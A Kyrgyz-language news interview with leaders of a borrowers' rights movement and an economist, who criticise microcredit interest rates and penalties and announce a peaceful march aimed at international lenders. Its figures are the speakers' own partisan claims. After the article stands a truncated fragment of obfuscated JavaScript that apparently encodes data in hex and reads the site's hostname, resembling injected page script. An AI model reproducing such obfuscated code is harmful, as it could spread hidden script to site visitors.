Өлкөбүздөгү эл аралык уюмдарга сөзүбүз өтпөсө, улуттук таламды талаша албасак, анда бизде ар-намыс деген барбы?

2-фотоЭгемендүүлүк жылдардан бери Кыргызстан эли насыянын үстөк пайызына илинип, жипсиз сыйыртмакка түшкөн кулдардан бешбетер тапкан оокатын үйнө жыйбастан, сырттан башкарылган банктардын эничисине жыйып берип келе жатат. Өкмөт болсо кайдыгер, эл жоош. Жашоо кыйын. Келечек туӊгуюктуу. Ушундай ортозаар учурду башынан кечирип келаткан элдин таламын талашаар, укугун коргоор, кызыкчылыгын жактаар насыячылардын кыймылы пайда болуп, бир топ жылдан бери акыйкатсыздык менен алышууда.

Ал эми бүгүн биз «Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын» төрайымы Акылай КЕНЕКЕЕВА, теңтөрагасы Кубат ТОКСОБАЕВ жана экономист Кубан ЧОРОЕВ менен маектешип, май айынын соңунда насыячылардын Кыймылы өткөрө турган тынч жүрүш акциясы тууралуу сөз козгодук.

– Жакында боло турган элдик тынч акцияны уюштуруу демилгеси кимден чыкты?

3-Кенекеева

Акылай КЕНЕКЕЕВА, «Кыргызстандагы насыя алуучулардын укугун коргоо элдик кыймылынын» төрайымы: – Демилге элдин өзүнөн чыкты, эл өзү кыймылга келбесе, суроо-талаптары барган сайын көбөйбөсө биз минтип чуркабайт элек. Насыячылардын кыймылы да элдин ичинен уюшулуп чыккан. 2010-жылдан кийин кредит алган элдин жашоо абалы такыр эле начарлап кетти, өзүңөр билгендей революциядан кийин эл жыргап жашап кеткен жок, азыр дагы элеттеги элдин жашоосу жеңил эмес. Ушул күнгө чейин биз канча жылдан бери депутаттарга, өкмөткө кайрылдык, насыялардын үстөк пайызынын чоңдугу жана берилген мөөнөтүнүн аздыгы элди такыр кыйнап жибергенин айттык, бирок  эч кандай реалдуу жардам болгон жок. Суроолорубуз жоопсуз бойдон калууда. Карыз сазына батып, насыяларын төлөй албай калган үй-бүлөлөрдүн айласы  куруду. Мындан ары да насыяны кыйынчылык менен төлөө абалы созулуп кете бере турган болсо, анда эзели карапайым калк оңоло тургандай эмес.

Биз канча жылдан бери ар кайсы чоңдорго, саясатчыларга  кайрылып жүрүп, эч бир таяныч таба албадык. Анан ушул маселелер боюнча экономист Кубан Чороевдин теле берүүдөн сүйлөгөн сөзүн, аналитикалык түшүндүрмөсүн угуп калып, ага жардамга кайрылдык. Анткени, карапайым эл маселенин көйгөйлүү экенин сезип түшүнгөнү менен, аны аналитикалык деңгээлде майдалап түшүнө бербейт. Ошондуктан, Кубан Чороевге кайрылып аны менен иштешкенибизден бери, анын изилдөөлөрү биздин багытыбызды тактап, элдин түшүнүүсүн жогорулатууга чоң салымын берди.

– Боло турган тынч акция чындап эле тынч болоруна көзүңүздөр жетеби?

– Коомчулукка эскертип айта кетчү нерсе, биздин мүдөөбүз  эч кандай саясый кызыкчылыктарды көздөбөйт, азыр айрымдар ойлоп аткандай, «элдик парламент» деген аталыштагы оппозициялык күчтөргө тиешебиз, байланышыбыз жок. Алардын оппозициялык маанайларын колдобойбуз дагы, ансыз дагы кыйналган элди кайрадан курал кылып колдонууларына каршыбыз.

24 жылдан бери насыячылар көп нерсени түшүнбөй, калыс-акыйкат мамилеге суусап келген. Эмне себептен бизде насыялар башка өлкөлөрдөгүдөй болуп 5-10 % менен элге берилбейт деген сыяктуу суроолор ар кимди ойлондуруп келер эле. Эми болсо бул маселелердин чечүү жолу табылып турганына эл сүйүнүп, тынч жол менен өз үнүн жеткиргени турат. Жүрүштө эч кандай «кетсин» деген талаптар болбойт, эл ансыз да ызы-чуудан  тажап, жалкып бүткөн. Биздин максат – коюлуп жаткан маселени мыйзам чегинде, тынчтык жолу менен чечүүнү талап кылуу болуп саналат. Бул тууралуу биздин эки манифестте тең айтылды. Элди карыз сазынан сууруп, балдарга таза жана кенен мүмкүнчүлүктүү келечекти камсыз кылууну тилек кылабыз. Бул – элдин жүрөгүндөгү мүдөөсү жана зарлап күткөн кыялы.

Элдик жүрүш салтанаттуу маанайда, тынчтык ниети менен болот жана анын мааниси –  элдин үнүн дүйнөлүк донорлорго жана финансы уюмдарына жеткирүү. Биз коюп жаткан талаптар абстрактуу эмес, аткарууга мүмкүн боло турган реалдуу сунуштар болгондуктан,  биздеги эл аралык уюмдардан ошол талаптарды аткарып берүүсүн суранабыз. Бул жүрүш, аң-сезимдүү түрдө ойлонулуп, талданып, уюштурулган жүрүш.

– «Убагында төлөй албагандан кийин эмнеге насыя алышат» деген сөз да көп болушу мүмкүн, ушуга кандай жооп айтат элеңиз?

3-К Чороев

Кубан ЧОРОЕВ, экономист: – Биздин элде аманат деген түптүү түшүнүк бар. Аманатты кайтарып берүү, аманатты аткаруу салты бизге ата-бабаларыбыздан өткөрүлүп берилген мыйзам болуп эсептелет. Алганды бериш керек деген түшүнүк каныбызга сиңген. Кыргыз элиндеги ушул жакшы адамдык сапат бүгүнкү күндө Батыш өлкөлөрүндө негизделген эл аралык финансы уюмдары тарабынан өздөрүнүн кызыкчылыктарына карай иштетилип жатат.  Элибиздин жакшы сапаттары өзүнүн жыргалчылыгына иштетилбестен, бөтөн чакан чөйрөнүн ач көздүгүнө курман болууда. Кыргыздар насыялардын кымбаттыгына карабай эле алып жүрүп отурушту. Буга насыя шартын толук билбестиги дагы себеп болду. Элеттеги элдер насыя алып жатканда калькуляция кыла беришпейт. Айына мынчадан төлөйсүң десе, эл жөнөкөй да, аа мындай турбайбы деп көп этибарга албай койгон учурлар дагы болбой койгон жок.

Банктар азыр кокту-колотто жайгашкан айылдарга чейин рекламаларын жайылтып насыя алууга чакырык кылышууда. Тереңирээк анализ кыла турган болсок, мынчалык жогорку баадагы пайыздын көлөмү чынында эле элди эксплуатация кылууда. Ошондуктан, бүгүнкү күндө биз акыйкатты биринчи орунга коюп жатабыз. Эгер эл аралык уюмдар негиздеген банктар кыргызстандыктарга чындап эле жардам берип жакырчылыктан чыгарабыз дешсе, анда алар өздөрүнүн өлкөлөрүндөгү элине кандай шартта насыя беришсе, дал ошондой шартта бизге дагы беришсин. Экинчиден, бизге бүгүнкү күнү эл аралык уюмдар тарабынан түзүлгөн банктар берип жаткан насыя акчалары, ошол чет өлкөлүк жарандардын акчасы болуп эсептелет. Чет өлкөлөрдүн бюджетинен бөлүнгөн акча болуп саналат. Бул акчалар Кыргызстанды жакырчылыктан чыгаруу, кедейлигин жоюу максатында атайын бөлүнгөн каражаттар. Сырттан башкарылган банктар ушул максатта дүйнөдөгү өкмөттөрдөн акча алып, бизге болсо акылга сыйгыс оор шарт менен насыя беришүүдө. Муну мен жалпы улутка жасалган  акыйкатсыздык деп эсептейм.

Бул маселенин артында биздин элге жасалган кыянатчылык саясаты жатат. Насыя берип жаткан банктар элдин алына жараша калыс мамиле кылыш керек, биз ошону талап кылабыз, эл деген – кулдардын жыйындысы эмес, каалагандай кылып өкчөй берген.

Акылай КЕНЕКЕЕВА: – Эл алган насыясынын өлчөмүнөн да чоң акчаны төлөөгө мажбур болушууда. Себеби, убактысынан кичине кечеңдеп калышса процентиң мынча, пеняң-штрафың мынча деп эсептеп беришет да, ал акчасы очойгон сумма болуп чыга келет. Элдин жанталашып, канча мээнет жана азап менен таап барган акчасын ошентип,  банктар процентке, пеняга чыгарып салышууда.  Алганын төлөйүн, айтканын аткарайын деп умтулуп, анан бар мүмкүнчүлүгүн жумшап таап барган акчасынын жарымы штрафка кетип жатса, ушундай акыйкатсыздыктан улам элдин кыжырлануусу, нааразылыгы чыгып жатат да. Өкмөттөн, чоңдордон үмүт кылбай, канча жылдан бери өз алдынча аракеттенип жашап калган эл кредиттен кутулуш үчүн канын сыгып отуруп тапса да акчасы минтип карызын жаппай жатса анан жашоо болобу? Банктардан кутулуш үчүн бир адамдын бүтүндөй бир өмүрү кетип жатат. Жеңилдетүү жолун издебей, микрокредиттик компаниялар «кокус сиз өлүп калган учурда гана насыя кечирилет» деп айтышат, демек, мындай абалдан чыгууну бир гана жолу бар турбайбы?!

Кубан ЧОРОЕВ: – Биздин биринчи манифесттеги маселе биздин Улуттук банкка, Өкмөткө, Жогорку Кеңешке айтылган программа. Бирок кептин бардыгы эл аралык уюмдарда болгондуктан, биз адегенде эл аралык донорлор менен маселебизди экинчи манифест менен чечишип алып туруп, анан биринчи манифестке кайрылып келебиз. Ошондуктан, алгач эл аралык уюмдар жана чет өлкөлүк донорлор менен маселени бүткөрбөсө, бул жактан биринчи манифест боюнча талаптарды ишке ашырууга мүмкүн болбой калат.

Америка жараны насыясынын 15 жылда төгө турган процентин Кыргызстандын жараны бир жылда төгүп жатат. Маселен, элестетиңиз, Финка банкы быйыл 20 жылдыгын өткөрдү. 20 жылдын ичинде Кыргызстандын жараны Америка жараны 300 жылда төлөй турган процентин төгүп койду. Кыргызстандыктар, мындайча айтканда, небере, чөбөрөсүнө чейин процентин төгүп койду дегенге барабар. Ошол себептен эл ушунун компенсациясын талап кылып чыгып жатпайбы. Мисалы, Финка банкы  жыл сайын элге 7 млрд. сомго кредит берип, 2.5 млрд проценттик киреше табат. Америкалык банк мындай 2.5 миллиарддык киреше табыш үчүн элге 100 миллиарддан кем эмес акча бериши керек болот.

Айырманы байкадыңыздарбы? Мындай банктар элди тикелей эксплуатация кылышууда. Ошондуктан биз Гаагадагы сотко кайрылганы турабыз. Эксплуатация кылгандан бөлөк, элдин укугун террор кылып тепселеп жатканы адамзатка карата жасалган чоң кылмыш болуп эсептелет. Ал эми биздеги банктар болсо дүйнөдөгү микрофинансы компанияларын колдогон фонддордон, «мына биз кедейчилик менен күрөшүп жатабыз» деп алган акчаларды туура эмес жумшап жатышпайбы. Бул көрүнүш эл аралык деңгээлдеги көз боемочулук болууда.

– Биздин бийлик ушунун баардыгын көрүп-билип туруп неге унчукпайт?

Кубан ЧОРОЕВ: – Биздин трагедия ушунда болуп жатат. Мындай акыйкатсыздыкты көргөндөн кийин Тышкы иштер министрлиги эл аралык уюмдар менен жана биздеги элчиликтер менен иштеш керек болчу. Өзүбүздүн өлкөдөгү эл аралык уюмдарга тишибиз өтпөгөндөн кийин, улуттук таламды талаша албагандан кийин, элдин кызыкчылыгын коргой албагандан кийин, анда бизде ар-намыс деген барбы? Кайдыгерлик катуу басты. Ошондуктан биздин кыймыл – Элдик кыймыл. Өкмөт, Жогорку Кеңеш жасабаган нерсени эл өзү колго алып жасап жатат. Өкмөттүн функциясын эл мойнуна алды деген сөз.

3-Токсобаев

Кубат ТОКСОБАЕВ, теңтөрага: – Биринчиден, Кыргызстандагы эң чоң көйгөйлөрдүн бири – бул жумушсуздук. Жетиштүү деңгээлде тиричилик кылуу кыйын маселе. Негизи, башка өлкөлөрдө элге насыя берер алдында банктар бардык тобокелдиктерди эсептеп, элдин абалын түшүнүп туруп берет.

Мисалы үчүн мурдагы жылы Кыргызстанда катуу кургачылык болуп, дыйкандар күтүлгөн түшүмдөрүн ала алышкан жок. Ошого жараша түшкөн кирешеси дагы кескин түрдө төмөндөп кеткен. Мындай учурларды биздин банктар эсепке албайт. Ал эми башка өлкөлөрдө мындайда насыяларды жойгонго чейин барышат жана банктын эксперттери атайын изилдөөлөрдү жүргүзүп, валюталык өзгөрүүлөрдөн баштап, эмнени өндүрүү пайдалуурак боло тургандыгынан бери саресеп салып айтып турушат. Башкача айтканда, камкордук бар.

Бизде насыя элге башаламан, эч кандай камкордуксуз бериле баштаган. Дагы бир көйгөй, бул кол карыз менен ломбард. Эч бир мамлекетте биздикиндей сандагы ломбарддар жок. Бизден бөлөк мамлекеттерде, айрыкча Батышта элге «отрицательный процент» менен кредит берилип жатат. Мисалы, үй алам деп банктан 50 миң евро алса, 40 жылдын ичинде 40 миң евро төлөп берет, башкача айтканда, алган акчасынан аз берип калат. Бизде болсо проценттер өтө жогору.

Биздин кредиттик система ушунча жылдан бери айыл чарбасын дагы, өнөр жайды дагы талкалап, элди жакырчылыкка алып келгенден башка жыйынтык берген жок. Мындай карасаң, бул атайын жүргүзүлүп жаткан саясат экенин түшүнөсүң, болбосо, башка жооп табыш кыйын. Элде күнөө жок, колдон келген тиричилигин эптеп жасап келатат. Эл аралык финансы институттарынын  кыянатчыл саясаты жана биздин бийликтин коррупцияга чыланып калганы ушул жагдайга алып келди. Жумуш жок болгондуктан, кредит төлөйүн деп сыртка чыгып иштеп келейин десе, «запрет о не выезде» кылып коюшкан. Эл эми кантет, же бул жакта жумуш жок, же иштегенге чет жакка чыгарбайт…

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *